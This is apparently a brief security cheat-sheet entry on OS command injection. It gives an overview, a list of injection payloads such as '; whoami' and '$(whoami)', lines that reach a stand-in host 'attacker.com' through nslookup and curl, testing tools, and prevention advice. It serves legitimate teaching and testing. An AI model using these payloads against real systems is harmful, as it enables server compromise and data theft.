Command Injection

Overview

Command Injection is an attack where arbitrary commands are executed on the host operating system via a vulnerable application. It occurs when user input is passed to system-level commands without proper sanitization.

Command injection can lead to complete server compromise, data exfiltration, and lateral movement within the target environment.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Command Injection:

; whoami

| whoami

|| whoami

&& whoami

`whoami`

$(whoami)

; sleep 5

| ping -c 5 127.0.0.1

; nslookup attacker.com

| curl http://attacker.com/cmd

Tools & Techniques

Recommended tools for Command Injection:

• Commix: automated command injection detection
• Burp Suite: intercept and modify vulnerable parameters
• Check parameters: ping, traceroute, nslookup, host, whois, dig, curl, wget, exec

Prevention & Mitigation

Security recommendations to prevent Command Injection:

• Use parameterized APIs instead of system command execution
• Validate and sanitize all user input against allowlists
• Apply the principle of least privilege for application processes
• Use security libraries that escape shell metacharacters
• Implement Web Application Firewall (WAF) rules

References

Additional resources:

• https://owasp.org/www-community/attacks/Command_Injection
• https://portswigger.net/web-security/os-command-injection
• https://github.com/commixproject/commix